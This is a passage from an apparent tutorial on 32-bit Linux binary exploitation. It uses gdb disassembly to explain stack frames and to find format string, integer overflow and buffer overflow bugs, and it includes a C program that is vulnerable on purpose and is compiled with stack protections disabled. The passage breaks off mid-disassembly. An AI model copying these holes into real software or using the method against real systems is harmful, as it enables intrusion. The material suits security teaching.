pThe first, on line 10, is set up on line 9 with an argument:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWhat the first instruction is doing here is moving the address code0x80487f0/code into the address strongpointed to/strong by the a href="http://www.c-jump.com/CIS77/ASM/Stack/S77_0040_esp_register.htm" target="_blank"ESP register/a. These 2 lines relate to line 17 in our source code above./p pThe ESP register points to the top of the a href="https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29" target="_blank"stack/a and in the cdecl calling convension, before the actual call to the function, its arguments are strongpushed/strong onto the stack in reverse order. As there is only 1 argument to this call only 1 is put on the stack./p pTo be honest, this call doesn't look like its going to be of interest as the argument is a static address and it points to the a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank"text segment/a of memory which isn't writable, but we can check the value of this just to make sure:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x80487f0/span/span span class="code-line"span class="go"0x80487f0: quot;Usage: quot;/span/span span class="code-line"/code/pre/div /td/tr/table pSo it looks to be part of an error message. The next call to codeprintf/code looks more interesting but first we need to understand how a stack frame is arranged in an application like this./p h2Stack Frames/h2 pBelow is the top of an example stack frame which is getting ready for a function call:/p pimg src="/assets/images/x86-32-linux/stack1.jpg" width="300"/p pHere we are unable to see the base pointer (EBP) but we can see the stack pointer (ESP) which always points to the top of the stack./p pPutting arguments on the stack can be done in a number of ways. Firstly it can be done using the codepush/code instruction as follows:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"push/spanspan class="w" /spanspan class="nb"eax/spanspan class="w"/span/span span class="code-line"span class="nf"push/spanspan class="w" /spanspan class="mh"0x80487f0/spanspan class="w"/span/span span class="code-line"span class="nf"push/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebp/spanspan class="o"+/spanspan class="nv"c/spanspan class="p"]/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pHere the value is the EAX register is being strongpushed/strong onto the stack as the third argument (or "ARG 3" in our diagram), then the static value code0x80487f0/code as the second argument and finally EBP+c (or EBP+12, which is usually the second argument to the current function) as the first argument./p pThe codepush/code instruction automatically adjusts the value of ESP accordingly but it can also be done manually:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"sub/spanspan class="w" /spanspan class="nb"esp/spanspan class="p",/spanspan class="w" /spanspan class="mh"0xc/spanspan class="w"/span/span span class="code-line"span class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"esp/spanspan class="o"+/spanspan class="mi"8/spanspan class="p"],/spanspan class="w" /spanspan class="nb"eax/spanspan class="w"/span/span span class="code-line"span class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"esp/spanspan class="o"+/spanspan class="mi"4/spanspan class="p"],/spanspan class="w" /spanspan class="mh"0x80487f0/spanspan class="w"/span/span span class="code-line"span class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"esp/spanspan class="p"],/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebp/spanspan class="o"+/spanspan class="nv"c/spanspan class="p"]/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis set of instructions are functionally the same as the previous. These are followed by a codecall/code instruction and after the call instruction our stack looks like this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pThe codecall/code instruction autmatically strongpushes/strong the memory address of the next instruction onto the stack. This is done so that when a function returns the application knows where to start executing instructions./p pInside the function that we have just called we start executing that functions prologue. First there is a codepush ebp/code instruction which does this to the stack:/p pimg src="/assets/images/x86-32-linux/stack3.jpg" width="300"/p pAfter that it executes codemov ebp, esp/code:/p pimg src="/assets/images/x86-32-linux/stack4.jpg" width="300"/p pLastly any space for needed for local variables is subtracted from ESP (codesub esp, 0x8/code), so our stack ends up like this:/p pimg src="/assets/images/x86-32-linux/stack5.jpg" width="300"/p pEBP always points to the start of the current functions stack frame and ESP to the top of the stack so if we call another function inside the current function the same process would happen./p pThe functions epilogue does the opposite, in the application we are debugging it just have to codeleave/code instruction. The codeleave/code instruction automates the cleanup of the stack frame./p pIn our example stack, the codeleave/code function would be equivalent to:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nf"add/spanspan class="w" /spanspan class="nb"esp/spanspan class="p",/spanspan class="w" /spanspan class="mh"0x8/spanspan class="w"/span/span span class="code-line"span class="nf"pop/spanspan class="w" /spanspan class="nb"ebp/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis would bring our stack frame back to this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pAnd then the final coderet/code instruction would remove the strongRET ADDR/strong from the stack setting everything back to how it was before the function call, coderet/code essentially does codepop eip/code./p h2Juicy Bits Continued/h2 pNow that we understand how the stack works we can have a look at that second call to codeprintf/code. The first argument to codeprintf/code is always the format string so when looking for a format string vulnerability we are trying to figure out if we can control the first argument./p pThe relevant lines that setup and call codeprintf/code are:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804862f lt;+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pThese 4 lines of code is actually line 18 in the source of the application. Line 1 moves the second argument (codeebp+0xc/code) (the second argument is always +C or +12 because EBP points to the old EBP, +4 points to the return address and +8 points to the first argument) into EAX./p pIn C the second argument to the main function is a list of pointers to the actual application arguments./p pBecause this argument is an array of pointers, line 2 moves the first pointer in this array into EAX (this normally points to the path of the application itself)./p pThis pointer is moved to the address pointed to by ESP (the top of the stack) and finally codeprintf/code is called. This shows that only 1 argument was given and that argument is the application path./p pWe can check this using codegdb/code but first there was a conditional statement which determined if this code got executed:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="x" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the codeif/code statement on line 16 of the source code./p pLine 1 compares the first argument codeebp+0x8/code, with 1 and jumps to code0x804864c/code if the first argument is greater than 1. As you can see the assembly condition is the opposite to what is in the source code, this is often the case./p pIn C the first argument to the main function is the number of arguments give to the application on the command line so to enter the section of code we want to analyse we just need to give the application 1 argument (the name of the application is considered the first argument so there is always at least 1)./p h3Integer Overflow/h3 pThe codejg/code instruction means that the numbers that are being compared are signed (it would be codeja/code if they were unsigned) and because there is no bound checking done on codeebp+0x8/code, it is vulnerable to an integer overflow:/p pI wanted to demostrate this as soon as I realised but because it is an integer I need to send at least 2147483647 arguments, I couldn't do this on my test machine because there just isn't enough RAM./p pSo in the name of science, I rewrote the application so that the codeargc/code argument (or the number of arguments passed to the main function) is a codechar/code instead, here is my new application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pHere is the quick demonstration:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:/home/testuser# /spangcc -z execstack -fno-stack-protector -o app-intof app-intof.c /span span class="code-line"span class="gp"root@dev:/home/testuser# ./app-intof $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;A quot;*126#39;/spanspan class="o")/span/span span class="code-line"span class="go"Wrong password: A/span/span span class="code-line"span class="gp"root@dev:/home/testuser# ./app-intof $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;A quot;*127#39;/spanspan class="o")/span/span span class="code-line"span class="go"Usage: ./app-intof lt;passwordgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWhat is happening here is that the argument codeargc/code is being interpreted as a signed char and the max value for this type of variable is 127:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:/home/testuser# /spangrep SCHAR_MAX /usr/include/limits.h /span span class="code-line"span class="gp"# /spandefine SCHAR_MAX span class="m"127/span/span span class="code-line"span class="gp"# /spandefine CHAR_MAX SCHAR_MAX/span span class="code-line"/code/pre/div /td/tr/table pAs the application is the first argument, we can have another 126 argument before the variable overflows and becomes -128, which is obviously smaller than 2./p h2Back To The Juicy Bits/h2 pSo now we know how to get to the code we want to analyse, which is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804862f lt;+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pLet's set a breakpoint on line 1 here (or code0x08048627/code) and run the application without any arguments./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x08048627/span/span span class="code-line"span class="go"Breakpoint 1 at 0x8048627/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/testuser/app /span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 1, 0x08048627 in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble $eip,+10/span/span span class="code-line"span class="go"Dump of assembler code from 0x8048627 to 0x8048631:/span/span span class="code-line"span class="go"=gt; 0x08048627 lt;main+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;main+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;main+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;main+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xw $ebp+0xc/span/span span class="code-line"span class="go"0xbfc674f4: 0xbfc67594/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/xw 0xbfc67594/span/span span class="code-line"span class="go"0xbfc67594: 0xbfc6795f/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0xbfc6795f/span/span span class="code-line"span class="go"0xbfc6795f: quot;/home/testuser/appquot;/span/span span class="code-line"/code/pre/div /td/tr/table pThis shows that our assumptions were correct and that there is likely a format string vulnerability here which we can exploit by chaning the name of the application (or creating a symlink as in a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"part 2/a./p pWe also have a very similar set of codeprintf/code calls towards the end of the application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="x" 0x0804866e lt;+98gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="x" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="x" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x0804867e lt;+114gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWe are interested in the second codeprintf/code here but to figure out how to get to it we need to have a look at the memory at code0x8048804/code which is printed just before./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s 0x8048804/span/span span class="code-line"span class="go"0x8048804: quot;Wrong password: quot;/span/span span class="code-line"/code/pre/div /td/tr/table pSo we get to this section of code when we give a wrong password. The call to the codeprintf/code in question is the same as previous except 4 is added to EAX before the pointer is followed. This suggests the second argument is being printed (also the previous codeprintf/code supports our theory), but let's check./p pLet's set a breakpoint and examine the memory again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"info breakpoints/span/span span class="code-line"span class="go"Num Type Disp Enb Address What/span/span span class="code-line"span class="go"1 breakpoint keep y 0x08048627 lt;main+27gt;/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"delete 1/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"break *0x0804867b/span/span span class="code-line"span class="go"Breakpoint 2 at 0x804867b/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r ABC/span/span span class="code-line"span class="go"Starting program: /home/testuser/app ABC/span/span span class="code-line"/span span class="code-line"span class="go"Breakpoint 2, 0x0804867b in main ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/s $eax/span/span span class="code-line"span class="go"0xbffff96d: quot;ABCquot;/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the second format string vulnerability./p h2Buffer Overflow/h2 pSo far we have found an integer overflow and 2 format string vulnerabilities./p pNext we should look over the codecheckpass/code function which is called on line 23 of the disassembly above. Here is the relevant instructions related to the call to codecheckpass/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="x" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="x" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"/code/pre/div /td/tr/table pWe've already seen a set of instructions that were exactly the same as this, the second call to codeprintf/code, so this function takes 1 argument, the second argument to the application./p pHere is the disassembly of codecheckpass/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble checkpass/span/span span class="code-line"span class="go"Dump of assembler code for function checkpass:/span/span span class="code-line"span class="go" 0x080486a2 lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x080486a3 lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x080486a5 lt;+3gt;: sub esp,0x228/span/span span class="code-line"span class="go" 0x080486ab lt;+9gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="go" 0x080486ae lt;+12gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486b1 lt;+15gt;: call 0x80484d0 lt;strlen@pltgt;/span/span span class="code-line"span class="go" 0x080486b6 lt;+20gt;: add eax,0x1/span/span span class="code-line"span class="go" 0x080486b9 lt;+23gt;: mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="go" 0x080486bd lt;+27gt;: mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="go" 0x080486c0 lt;+30gt;: mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="go" 0x080486c4 lt;+34gt;: lea eax,[ebp-0x20c]/span/span span class="code-line"span class="go" 0x080486ca lt;+40gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x080486cd lt;+43gt;: call 